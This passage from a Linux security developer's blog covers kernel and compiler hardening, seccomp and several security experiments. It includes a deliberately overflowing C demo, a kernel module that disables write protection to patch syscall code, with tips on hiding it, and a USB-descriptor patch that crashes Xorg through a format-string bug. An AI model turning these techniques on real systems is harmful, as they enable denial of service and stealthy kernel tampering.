In 2009, I reported this bug to glibc, describing the problem that exists when a program is using select, and has its open file descriptor resource limit raised above 1024 (FD_SETSIZE). If a network daemon starts using the FD_SET/FD_CLR glibc macros on fdset variables for descriptors larger than 1024, glibc will happily write beyond the end of the fdset variable, producing a buffer overflow condition. (This problem had existed since the introduction of the macros, so, for decades? I figured it was long over-due to have a report opened about it.)

At the time, I was told this wasn’t going to be fixed and “every program using [select] must be considered buggy.” 2 years later still more people kept asking for this feature and continued to be told “no”.

But, as it turns out, a few months later after the most recent “no”, it got silently fixed anyway, with the bug left open as “Won’t Fix”! I’m glad Florian did some house-cleaning on the glibc bug tracker, since I’d otherwise never have noticed that this protection had been added to the ever-growing list of -D_FORTIFY_SOURCE=2 protections.

I’ll still recommend everyone use poll instead of select, but now I won’t be so worried when I see requests to raise the open descriptor limit above 1024.

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

May 7, 2014

Linux Security Summit 2014

Filed under: Blogging,Chrome OS,Debian,General,Security,Ubuntu,Ubuntu-Server — kees @ 10:31 am

The Linux Security Summit is happening in Chicago August 18th and 19th, just before LinuxCon. Send us some presentation and topic proposals, and join the conversation with other like-minded people. :)

I’d love to see what people have been working on, and what they’d like to work on. Our general topics will hopefully include:

  • System hardening
  • Access control
  • Cryptography
  • Integrity control
  • Hardware security
  • Networking
  • Storage
  • Virtualization
  • Desktop
  • Tools
  • Management
  • Case studies
  • Emerging technologies, threats & techniques

The Call For Participation closes June 6th, so you’ve got about a month, but earlier is better.

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

February 3, 2014

compiler hardening in Ubuntu and Debian

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 8:42 am

Back in 2006, the compiler in Ubuntu was patched to enable most build-time security-hardening features (relro, stack protector, fortify source). I wasn’t able to convince Debian to do the same, so Debian went the route of other distributions, adding security hardening flags during package builds only. I remain disappointed in this approach, because it means that someone who builds software without using the packaging tools on a non-Ubuntu system won’t get those hardening features. Think of a sysadmin trying the latest nginx, or a vendor like Valve building games for distribution. On Ubuntu, when you do that “./configure && make” you’ll get the features automatically.

Debian, at the time, didn’t have a good way forward even for package builds since it lacked a concept of “global package build flags”. Happily, a solution (via dh) was developed about 2 years ago, and Debian package maintainers have been working to adopt it ever since.

So, while I don’t think any distro can match Ubuntu’s method of security hardening compiler defaults, it is valuable to see the results of global package build flags in Debian on the package archive. I’ve had an on-going graph of the state of build hardening on both Ubuntu and Debian for a while, but only recently did I put together a comparison of a default install. Very few people have all the packages in the archive installed, so it’s a bit silly to only look at the archive statistics. But let’s start there, just to describe what’s being measured.

Here’s today’s snapshot of Ubuntu’s development archive for the past year (you can see development “opening” after a release every 6 months with an influx of new packages):

Here’s today’s snapshot of Debian’s unstable archive for the past year (at the start of May you can see the archive “unfreezing” after the Wheezy release; the gaps were my analysis tool failing):

Ubuntu’s lines are relatively flat because everything that can be built with hardening already is. Debian’s graph is on a slow upward trend as more packages get migrated to dh to gain knowledge of the global flags.

Each line in the graphs represents the count of source packages that contain binary packages that have at least 1 “hit” for a given category. “ELF” is just that: a source package that ultimately produces at least 1 binary package with at least 1 ELF binary in it (i.e. produces a compiled output). The “Read-only Relocations” (“relro”) hardening feature is almost always done for an ELF, excepting uncommon situations. As a result, the count of ELF and relro are close on Ubuntu. In fact, examining relro is a good indication of whether or not a source package got built with hardening of any kind. So, in Ubuntu, 91.5% of the archive is built with hardening, with Debian at 55.2%.

The “stack protector” and “fortify source” features depend on characteristics of the source itself, and may not always be present in package’s binaries even when hardening is enabled for the build (e.g. no functions got selected for stack protection, or no fortified glibc functions were used). Really these lines mostly indicate the count of packages that have a sufficiently high level of complexity that would trigger such protections.

The “PIE” and “immediate binding” (“bind_now”) features are specifically enabled by a package maintainer. PIE can have a noticeable performance impact on CPU-register-starved architectures like i386 (ia32), so it is neither patched on in Ubuntu, nor part of the default flags in Debian. (And bind_now doesn’t make much sense without PIE, so they usually go together.) It’s worth noting, however, that it probably should be the default on amd64 (x86_64), which has plenty of available registers.

Here is a comparison of default installed packages between the most recent stable releases of Ubuntu (13.10) and Debian (Wheezy). It’s clear that what the average user gets with a default fresh install is better than what the archive-to-archive comparison shows. Debian’s showing is better (74% built with hardening), though it is still clearly lagging behind Ubuntu (99%):

© 2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

January 27, 2014

-fstack-protector-strong

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 2:28 pm

There will be a new option in gcc 4.9 named “-fstack-protector-strong“, which offers an improved version of “-fstack-protector” without going all the way to “-fstack-protector-all“. The stack protector feature itself adds a known canary to the stack during function preamble, and checks it when the function returns. If it changed, there was a stack overflow, and the program aborts. This is fine, but figuring out when to include it is the reason behind the various options.

Since traditionally stack overflows happen with string-based manipulations, the default (-fstack-protector), only includes the canary code when a function defines an 8 (--param=ssp-buffer-size=N, N=8 by default) or more byte local character array. This means just a few functions get the checking, but they’re probably the most likely to need it, so it’s an okay balance. Various distributions ended up lowering their default --param=ssp-buffer-size option down to 4, since there were still cases of functions that should have been protected but the conservative gcc upstream default of 8 wasn’t covering them.

However, even with the increased function coverage, there are rare cases when a stack overflow happens on other kinds of stack variables. To handle this more paranoid concern, -fstack-protector-all was defined to add the canary to all functions. This results in substantial use of stack space for saving the canary on deep stack users, and measurable (though surprisingly still relatively low) performance hit due to all the saving/checking. For a long time, Chrome OS used this, since we’re paranoid. :)

In the interest of gaining back some of the lost performance and not hitting our Chrome OS build images with such a giant stack-protector hammer, Han Shen from the Chrome OS compiler team created the new option -fstack-protector-strong, which enables the canary in many more conditions:

  • local variable’s address used as part of the right hand side of an assignment or function argument
  • local variable is an array (or union containing an array), regardless of array type or length
  • uses register local variables

This meant we were covering all the more paranoid conditions that might lead to a stack overflow. Chrome OS has been using this option instead of -fstack-protector-all for about 10 months now.

As a quick demonstration of the options, you can see this example program under various conditions. It tries to show off an example of shoving serialized data into a non-character variable, like might happen in some network address manipulations or streaming data parsing. Since I’m using memcpy here for clarity, the builds will need to turn off FORTIFY_SOURCE, which would also notice the overflow.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct no_chars {
    unsigned int len;
    unsigned int data;
};

int main(int argc, char * argv[])
{
    struct no_chars info = { };

    if (argc < 3) {
        fprintf(stderr, "Usage: %s LENGTH DATA...\n", argv[0]);
        return 1;
    }

    info.len = atoi(argv[1]);
    memcpy(&info.data, argv[2], info.len);

    return 0;
}

Built with everything disabled, this faults trying to return to an invalid VMA:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fno-stack-protector /tmp/boom.c -o /tmp/boom
    $ /tmp/boom 64 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Segmentation fault (core dumped)
    

Built with FORTIFY_SOURCE enabled, we see the expected catch of the overflow in memcpy:

    $ gcc -Wall -O2 -D_FORTIFY_SOURCE=2 -fno-stack-protector /tmp/boom.c -o /tmp/boom
    $ /tmp/boom 64 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    *** buffer overflow detected ***: /tmp/boom terminated
    ...
    

So, we’ll leave FORTIFY_SOURCE disabled for our comparisons. With pre-4.9 gcc, we can see that -fstack-protector does not get triggered to protect this function:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector /tmp/boom.c -o /tmp/boom
    $ /tmp/boom 64 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    Segmentation fault (core dumped)
    

However, using -fstack-protector-all does trigger the protection, as expected:

    $ gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector-all /tmp/boom.c -o /tmp/boom
    $ /tmp/boom 64 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    *** stack smashing detected ***: /tmp/boom terminated
    Aborted (core dumped)
    

And finally, using the gcc snapshot of 4.9, here is -fstack-protector-strong doing its job:

    $ /usr/lib/gcc-snapshot/bin/gcc -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector-strong /tmp/boom.c -o /tmp/boom
    $ /tmp/boom 64 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    *** stack smashing detected ***: /tmp/boom terminated
    Aborted (core dumped)
    

For Linux 3.14, I’ve added support for -fstack-protector-strong via the new CONFIG_CC_STACKPROTECTOR_STRONG option. The old CONFIG_CC_STACKPROTECTOR will be available as CONFIG_CC_STACKPROTECTOR_REGULAR. When comparing the results on builds via size and objdump -d analysis, here’s what I found with gcc 4.9:

A normal x86_64 “defconfig” build, without stack protector had a kernel text size of 11430641 bytes with 36110 function bodies. Adding CONFIG_CC_STACKPROTECTOR_REGULAR increased the kernel text size to 11468490 (a +0.33% change), with 1015 of 36110 functions stack-protected (2.81%). Using CONFIG_CC_STACKPROTECTOR_STRONG increased the kernel text size to 11692790 (+2.24%), with 7401 of 36110 functions stack-protected (20.5%). And 20% is a far-cry from 100% if support for -fstack-protector-all was added back to the kernel.

The next bit of work will be figuring out the best way to detect the version of gcc in use when doing Debian package builds, and using -fstack-protector-strong instead of -fstack-protector. For Ubuntu, it’s much simpler because it’ll just be the compiler default.

© 2014 – 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

December 20, 2013

DOM scraping

Filed under: Blogging,Debian,General,Ubuntu,Ubuntu-Server,Web — kees @ 11:16 pm

For a long time now I’ve used mechanize (via either Perl or Python) for doing website interaction automation. Stuff like playing web games, checking the weather, or reviewing my balance at the bank. However, as the use of javascript continues to increase, it’s getting harder and harder to screen-scrape without actually processing DOM events. To do that, really only browsers are doing the right thing, so getting attached to an actual browser DOM is generally the only way to do any kind of web interaction automation.

It seems the thing furthest along this path is Selenium. Initially, I spent some time trying to make it work with Firefox, but gave up. Instead, this seems to work nicely with Chrome via the Chrome WebDriver. And even better, all of this works out of the box on Ubuntu 13.10 via python-selenium and chromium-chromedriver.

Running /usr/lib/chromium-browser/chromedriver2_server from chromium-chromedriver starts a network listener on port 9515. This is the WebDriver API that Selenium can talk to. When requests are made, chromedriver2_server spawns Chrome, and all the interactions happen against that browser.

Since I prefer Python, I avoided the Java interfaces and focused on the Python bindings:

#!/usr/bin/env python
import sys
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys

caps = webdriver.DesiredCapabilities.CHROME

browser = webdriver.Remote("http://localhost:9515", caps)

browser.get("https://bank.example.com/")
assert "My Bank" in browser.title

try:
    elem = browser.find_element_by_name("userid")
    elem.send_keys("username")

    elem = browser.find_element_by_name("password")
    elem.send_keys("wheee my password" + Keys.RETURN)
except NoSuchElementException:
    print "Could not find login elements"
    sys.exit(1)

assert "Account Balances" in browser.title

xpath = "//div[text()='Balance']/../../td[2]/div[contains(text(),'$')]"
balance = browser.find_element_by_xpath(xpath).text

print balance

browser.close()

This would work pretty great, but if you need to save any state between sessions, you’ll want to be able to change where Chrome stores data (since by default in this configuration, it uses an empty temporary directory via --user-data-dir=). Happily, various things about the browser environment can be controlled, including the command line arguments. This is configurable by expanding the “desired capabilities” variable:

caps = webdriver.DesiredCapabilities.CHROME
caps["chromeOptions"] = {
        "args": ["--user-data-dir=/home/user/somewhere/to/store/your/session"],
    }

A great thing about this is that you get to actually watch the browser do its work. However, in cases where this interaction is going to be fully automated, you likely won’t have a Xorg session running, so you’ll need to wrap the WebDriver in one (since it launches Chrome). I used Xvfb for this:

#!/bin/bash
# Start WebDriver under fake X and wait for it to be listening
xvfb-run /usr/lib/chromium-browser/chromedriver2_server &
pid=$!
while ! nc -q0 -w0 localhost 9515; do
    sleep 1
done

the-chrome-script
rc=$?

# Shut down WebDriver
kill $pid

exit $rc

Alternatively, all of this could be done in the python script too, but I figured it’s easier to keep the support infrastructure separate from the actual test script itself. I actually leave the xvfb-run call external too, so it’s easier to debug the browser in my own X session.

One bug I encountered was that the WebDriver’s cache of the browser’s DOM can sometimes get out of sync with the actual browser’s DOM. I didn’t find a solution to this, but managed to work around it. I’m hoping later versions fix this. :)

© 2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

December 10, 2013

live patching the kernel

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 3:40 pm

A nice set of recent posts have done a great job detailing the remaining ways that a root user can get at kernel memory. Part of this is driven by the ideas behind UEFI Secure Boot, but they come from the same goal: making sure that the root user cannot directly subvert the running kernel. My perspective on this is toward making sure that an attacker who has gained access and then gained root privileges can’t continue to elevate their access and install invisible kernel rootkits.

An outline for possible attack vectors is spelled out by Matthew Gerrett’s continuing “useful kernel lockdown” patch series. The set of attacks was examined by Tyler Borland in “Bypassing modules_disabled security”. His post describes each vector in detail, and he ultimately chooses MSR writing as the way to write kernel memory (and shows an example of how to re-enable module loading). One thing not mentioned is that many distros have MSR access as a module, and it’s rarely loaded. If modules_disabled is already set, an attacker won’t be able to load the MSR module to begin with. However, the other general-purpose vector, kexec, is still available. To prove out this method, Matthew wrote a proof-of-concept for changing kernel memory via kexec.

Chrome OS is several steps ahead here, since it has hibernation disabled, MSR writing disabled, kexec disabled, modules verified, root filesystem read-only and verified, kernel verified, and firmware verified. But since not all my machines are Chrome OS, I wanted to look at some additional protections against kexec on general-purpose distro kernels that have CONFIG_KEXEC enabled, especially those without UEFI Secure Boot and Matthew’s lockdown patch series.

My goal was to disable kexec without needing to rebuild my entire kernel. For future kernels, I have proposed adding /proc/sys/kernel/kexec_disabled, a partner to the existing modules_disabled, that will one-way toggle kexec off. For existing kernels, things got more ugly.

What options do I have for patching a running kernel?

First I looked back at what I’d done in the past with fixing vulnerabilities with systemtap. This ends up being a rather heavy-duty way to go about things, since you need all the distro kernel debug symbols, etc. It does work, but has a significant problem: since it uses kprobes, a root user can just turn off the probes, reverting the changes. So that’s not going to work.

Next I looked at ksplice. The original upstream has gone away, but there is still some work being done by Jiri Slaby. However, even with his updates which fixed various build problems, there were still more, even when building a 3.2 kernel (Ubuntu 12.04 LTS). So that’s out too, which is too bad, since ksplice does exactly what I want: modifies the running kernel’s functions via a module.

So, finally, I decided to just do it by hand, and wrote a friendly kernel rootkit. Instead of dealing with flipping page table permissions on the normally-unwritable kernel code memory, I borrowed from PaX’s KERNEXEC feature, and just turn off write protect checking on the CPU briefly to make the changes. The return values for functions on x86_64 are stored in RAX, so I just need to stuff the kexec_load syscall with “mov -1, %rax; ret” (-1 is EPERM):

#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt

#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>

static unsigned long long_target;
static char *target;
module_param_named(syscall, long_target, ulong, 0644);
MODULE_PARM_DESC(syscall, "Address of syscall");

/* mov $-1, %rax; ret */
unsigned const char bytes[] = { 0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
                                0xc3 };
unsigned char *orig;

/* Borrowed from PaX KERNEXEC */
static inline void disable_wp(void)
{
        unsigned long cr0;

        preempt_disable();
        barrier();
        cr0 = read_cr0();
        cr0 &= ~X86_CR0_WP;
        write_cr0(cr0);
}

static inline void enable_wp(void)
{
        unsigned long cr0;

        cr0 = read_cr0();
        cr0 |= X86_CR0_WP;
        write_cr0(cr0);
        barrier();
        preempt_enable_no_resched();
}

static int __init syscall_eperm_init(void)
{
        int i;
        target = (char *)long_target;

        if (target == NULL)
                return -EINVAL;

        /* save original */
        orig = kmalloc(sizeof(bytes), GFP_KERNEL);
        if (!orig)
                return -ENOMEM;
        for (i = 0; i < sizeof(bytes); i++) {
                orig[i] = target[i];
        }

        pr_info("writing %lu bytes at %p\n", sizeof(bytes), target);

        disable_wp();
        for (i = 0; i < sizeof(bytes); i++) {
                target[i] = bytes[i];
        }
        enable_wp();

        return 0;
}
module_init(syscall_eperm_init);

static void __exit syscall_eperm_exit(void)
{
        int i;

        pr_info("restoring %lu bytes at %p\n", sizeof(bytes), target);

        disable_wp();
        for (i = 0; i < sizeof(bytes); i++) {
                target[i] = orig[i];
        }
        enable_wp();

        kfree(orig);
}
module_exit(syscall_eperm_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Kees Cook <kees@outflux.net>");
MODULE_DESCRIPTION("makes target syscall always return EPERM");

If I didn’t want to leave an obvious indication that the kernel had been manipulated, the module could be changed to:

  • not announce what it’s doing
  • remove the exit route to not restore the changes on module unload
  • error out at the end of the init function instead of staying resident

And with this in place, it’s just a matter of loading it with the address of sys_kexec_load (found via /proc/kallsyms) before I disable module loading via modprobe. Here’s my upstart script:

# modules-disable - disable modules after rc scripts are done
#
description "disable loading modules"

start on stopped module-init-tools and stopped rc

task
script
        cd /root/modules/syscall_eperm
        make clean
        make
        insmod ./syscall_eperm.ko \
                syscall=0x$(egrep ' T sys_kexec_load$' /proc/kallsyms | cut -d" " -f1)
        modprobe disable
end script

And now I’m safe from kexec before I have a kernel that contains /proc/sys/kernel/kexec_disabled.

© 2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

November 26, 2013

Thanks UPS

Filed under: Blogging,Debian,Networking,Ubuntu,Ubuntu-Server — kees @ 8:25 pm

My UPS has decided that every two weeks when it performs a self-test that my 116V mains power isn’t good enough, so it drains the battery and shuts down my home network. Only took a month and a half for me to see on the network graphs that my outages were, to the minute, 2 weeks apart. :)

APC Monitoring

In theory, reducing the sensitivity will fix this…

© 2013 – 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

August 13, 2013

TPM providing /dev/hwrng

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 9:10 am

A while ago, I added support for the TPM’s pRNG to the rng-tools package in Ubuntu. Since then, Kent Yoder added TPM support directly into the kernel’s /dev/hwrng device. This means there’s no need to carry the patch in rng-tools any more, since I can use /dev/hwrng directly now:

# modprobe tpm-rng
# echo tpm-rng >> /etc/modules
# grep -v ^# /etc/default/rng-tools
RNGDOPTIONS="--fill-watermark=90%"
# service rng-tools restart

And as before, once it’s been running a while (or you send SIGUSR1 to rngd), you can see reporting in syslog:

# pkill -USR1 rngd
# tail -n 15 /var/log/syslog
Aug 13 09:51:01 linux rngd[39114]: stats: bits received from HRNG source: 260064
Aug 13 09:51:01 linux rngd[39114]: stats: bits sent to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: entropy added to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 successes: 13
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 failures: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Monobit: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Poker: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Runs: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Long run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Continuous run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: HRNG source speed: (min=10.433; avg=10.442; max=10.454)Kibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS tests speed: (min=73.360; avg=75.504; max=86.305)Mibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: Lowest ready-buffers level: 2
Aug 13 09:51:01 linux rngd[39114]: stats: Entropy starvations: 0
Aug 13 09:51:01 linux rngd[39114]: stats: Time spent starving for entropy: (min=0; avg=0.000; max=0)us

I’m pondering getting this running in Chrome OS too, but I want to make sure it doesn’t suck too much battery.

© 2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

May 9, 2013

Hardy is end of life

Filed under: Blogging,Ubuntu,Ubuntu-Server — kees @ 12:53 pm

Well, the second Ubuntu Long Term Support release, 8.04 Hardy, has reached end-of-life. (Along with 11.10 Oneiric and the Desktop Support for the 10.04 LTS Lucid.) Flushing my package mirror of Hardy and Oneiric was pretty dramatic, freeing up about 142GB worth of space.

Before:

$ df -h /var/cache/mirrors/
Filesystem                        Size  Used Avail Use% Mounted on
/dev/mapper/sysvg-debmirrorlv  753G  692G   62G  92% /var/cache/mirror

After:

$ df -h /var/cache/mirrors/
Filesystem                        Size  Used Avail Use% Mounted on
/dev/mapper/sysvg-debmirrorlv  753G  550G  204G  73% /var/cache/mirror

If only online filesize resize shrinking worked. :)

© 2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

January 21, 2013

facedancer built

Filed under: Blogging,Chrome OS,Embedded,Security,Ubuntu,Ubuntu-Server — kees @ 2:39 pm

I finally had the time to put together the facedancer11 that Travis Goodspeed was so kind to give me. I had ordered all the parts some time ago, but had been dreading the careful surface-mount soldering work it was going to require. As it turned out, I’m not half bad at it — everything seems to have worked the first time through. I did, however, fail to order 33ohm 0603 resistors, so I have some temporary ones in use until I can replace them.

My facedancer

This device allows the HOST side computer to drive USB protocol communication at the packet level, with the TARGET seeing a USB device on the other end. No more needing to write careful embedded code while breaking USB stacks: the fake USB device can be controlled with Python.

This means I’m able to start some more serious fuzzing of the USB protocol layer. There is already code for emulating HID (Keyboard), Mass Storage, and now Firmware Updates. There’s probably tons to look at just in that. For some background on the fun to be had just with Mass Storage devices, see Goodspeed’s 23C9 presentation on it.

© 2013 – 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

November 28, 2012

clean module disabling

Filed under: Blogging,Chrome OS,Security,Ubuntu,Ubuntu-Server — kees @ 3:55 pm

I think I found a way to make disabling kernel module loading (via /proc/sys/kernel/modules_disabled) easier for server admins. Right now there’s kind of a weird problem on some distros where reading /etc/modules races with reading /etc/sysctl.{conf,d}. In these cases, you can’t just put “kernel.modules_disabled=1” in the latter since you might not have finished loading modules from /etc/modules.

Before now, on my own systems, I’d added the sysctl call to my /etc/rc.local, which seems like a hack — that file is related to neither sysctl nor modules and both subsystems have their own configuration files, but it does happen absolutely last.

Instead, I’ve now defined “disable” as a modprobe alias via /etc/modprobe.d/disable.conf:

# To disable module loading after boot, "modprobe disable" can be used to
# set the sysctl that controls module loading.
install disable /sbin/sysctl kernel.modules_disabled=1

And then in /etc/modules I can list all the modules I actually need, and then put “disable” on the last line. (Or, if I want to not remember the sysctl path, I can manually run “modprobe disable” to turn off modules at some later point.)

I think it’d be cool this this become an internal alias in upstream kmod.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

November 2, 2012

ARM assembly

Filed under: Blogging,Chrome OS,Embedded,Ubuntu,Ubuntu-Server — kees @ 10:01 am

While I’ve been skimming ARM assembly here and there, yesterday I actually had to write some from scratch to hook up seccomp on ARM. I got stumped for a while, and ended up using two references frequently:

The suffix one is pretty interesting because ARM allows for instructions to be conditional, rather than being required to rely on branching, like x86. For example, if you wanted something like this in C:

    if (i == 0)
        i = 1;
    i = i + 1;

In x86 assembly, you’d have a compare followed by a jump to skip the moving of the “1” value:

    cmp %ecx, $0
    jne 2
    mov %ecx, $1
2:  inc %ecx

In ARM assembly, you can make the move conditional with a suffix (“mov if equal”):

    cmp   r2, #0
    moveq r2, #1
    add   r2, r2, #1

The real thing that stumped me yesterday, though, was the “!” suffix on load/store. Mainly, I didn’t notice it was there until I’d stared at the objdump output and systematically trimmed away all other other code that wasn’t changing the behavior:

    ldr r0, [sp, #OFFSET]
    str r0, [sp, #OFFSET]!

I was reading this as “variable = variable;” and I thought I was going crazy; how could a self-assignment change the code at all? In the second reference above, I found the that the trailing “!” means “(pre)increment the base by the offset”. I was doing a meaningless assignment, but it had the side-effect of pushing the “sp” register forward, and suddenly it all made sense (I needed to unwind the stack). The actual solution I needed was:

    add sp, sp, #S_OFF

Yay for a crash-course in actual ARM assembly. :)

(And yes, I’m aware of x86’s “cmov”, but I just wanted to do a simple illustration. ARM can do conditional calls!)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 1, 2012

Link restrictions released in Linux 3.6

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 12:59 pm

It’s been a very long time coming, but symlink and hardlink restrictions have finally landed in the mainline Linux kernel as of version 3.6. The protection is at least old enough to have a driver’s license in most US states, with some of the first discussions I could find dating from Aug 1996.

While this protection is old (to ancient) news for anyone running Chrome OS, Ubuntu, grsecurity, or OpenWall, I’m extremely excited that is can now benefit everyone running Linux. All the way from cloud monstrosities to cell phones, an entire class of vulnerability just goes away. Thanks to everyone that had a part in developing, testing, reviewing, and encouraging these changes over the years. It’s quite a relief to have it finally done. I hope I never have to include the year in my patch revision serial number again. :)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

May 16, 2012

USB AVR fun

At the recent Ubuntu Developer Summit, I managed to convince a few people (after assurances that there would be no permanent damage) to plug a USB stick into their machines so we could watch Xorg crash and wedge their console. What was this evil thing, you ask? It was an AVR microprocessor connected to USB, acting as a USB HID Keyboard, with the product name set to “%n”.

Recently a Chrome OS developer discovered that renaming his Bluetooth Keyboard to “%n” would crash Xorg. The flaw was in the logging stack, triggering glibc to abort the process due to format string protections. At first glance, it looks like this isn’t a big deal since one would have to have already done a Bluetooth pairing with the keyboard, but it would be a problem for any input device, not just Bluetooth. I wanted to see this in action for a “normal” (USB) keyboard.

I borrowed a “Maximus” USB AVR from a friend, and then ultimately bought a Minimus. It will let you put anything you want on the USB bus.

I added a rule for it to udev:

SUBSYSTEM=="usb", ACTION=="add", ATTR{idVendor}=="03eb", ATTR{idProduct}=="*", GROUP="plugdev"

installed the AVR tools:

sudo apt-get install dfu-programmer gcc-avr avr-libc

and pulled down the excellent LUFA USB tree:

git clone git://github.com/abcminiuser/lufa-lib.git

After applying a patch to the LUFA USB keyboard demo, I had my handy USB-AVR-as-Keyboard stick ready to crash Xorg:

-       .VendorID               = 0x03EB,
-       .ProductID              = 0x2042,
+       .VendorID               = 0x045e,
+       .ProductID              = 0x000b,
...
-       .UnicodeString          = L"LUFA Keyboard Demo"
+       .UnicodeString          = L"Keyboard (%n%n%n%n)"

In fact, it was so successfully that after I got the code right and programmed it, Xorg immediately crashed on my development machine. :)

make dfu

After a reboot, I switched it back to programming mode by pressing and holding the “H” button, press/releasing the “R” button, and releasing “H”.

The fix to Xorg is winding its way through upstream, and should land in your distros soon. In the meantime, you can disable your external USB ports, as Marc Deslauriers demonstrated for me:

echo "0" > /sys/bus/usb/devices/usb1/authorized
echo "0" > /sys/bus/usb/devices/usb1/authorized_default

Be careful of shared internal/external ports, and having two buses on one port, etc.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

March 26, 2012

keeping your process unprivileged

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 1:17 pm

One of the prerequisites for seccomp filter is the new PR_SET_NO_NEW_PRIVS prctl from Andy Lutomirski.

If you’re not interested in digging into creating a seccomp filter for your program, but you know your program should be effectively a “leaf node” in the process tree, you can call PR_SET_NO_NEW_PRIVS (nnp) to make sure that the current process and its children can not gain new privileges (like through running a setuid binary). This produces some fun results, since things like the “ping” tool expect to gain enough privileges to open a raw socket. If you set nnp to “1”, suddenly that can’t happen any more.

Here’s a quick example that sets nnp, and tries to run the command line arguments:

#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif

int main(int argc, char * argv[])
{
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
                perror("prctl(NO_NEW_PRIVS)");
                return 1;
        }

        return execvp(argv[1], &argv[1]);
}

When it tries to run ping, the setuid-ness just gets ignored:

$ gcc -Wall nnp.c -o nnp
$ ./nnp ping -c1 localhost
ping: icmp open socket: Operation not permitted

So, if your program has all the privs its going to need, consider using nnp to keep it from being a potential gateway to more trouble. Hopefully we can ship something like this trivial nnp helper as part of coreutils or similar, like nohup, nice, etc.

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

March 22, 2012

seccomp filter now in Ubuntu

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 10:02 pm

With the generous help of the Ubuntu kernel team, Will Drewry’s seccomp filter code has landed in Ubuntu 12.04 LTS in time for Beta 2, and will be in Chrome OS shortly. Hopefully this will be in upstream soon, and filter (pun intended) to the rest of the distributions quickly.

One of the questions I’ve been asked by several people while they developed policy for earlier “mode 2” seccomp implementations was “How do I figure out which syscalls my program is going to need?” To help answer this question, and to show a simple use of seccomp filter, I’ve written up a little tutorial that walks through several steps of building a seccomp filter. It includes a header file (“seccomp-bpf.h“) for implementing the filter, and a collection of other files used to assist in syscall discovery. It should be portable, so it can build even on systems that do not have seccomp available yet.

Read more in the seccomp filter tutorial. Enjoy!

© 2012 – 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

February 15, 2012

discard, hole-punching, and TRIM

Filed under: Chrome OS,Debian,Ubuntu,Ubuntu-Server — kees @ 1:19 pm

